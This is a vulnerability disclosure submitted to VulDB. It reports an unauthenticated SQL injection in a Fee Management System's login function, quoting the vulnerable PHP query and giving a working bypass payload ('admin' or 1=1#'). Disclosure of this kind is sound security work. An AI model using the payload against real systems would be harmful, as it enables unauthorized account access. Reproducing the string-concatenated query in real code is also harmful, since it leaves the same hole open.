Submit #42881: Unauthenticated SQL injection in Fee Management System in login page.المعلومات

TitleUnauthenticated SQL injection in Fee Management System in login page.
DescriptionFee Management System source code URL: in admin_class.php function login(){ extract($_POST); $qry = $this->db->query("SELECT * FROM users where username = '".$username."' and password = '".md5($password)."' "); ...... } the usename and password variables is directly spliced into sql statement. In login page, anyone can login with the below parameters: username: admin' or 1=1# password: whatever
Userzhangguohu (ID 30684)
Submission05/08/2022 11:44 (2 years ago)
Moderation05/08/2022 12:43 (59 minutes later)
Statusتمت الموافقة
VulDB Entry205658

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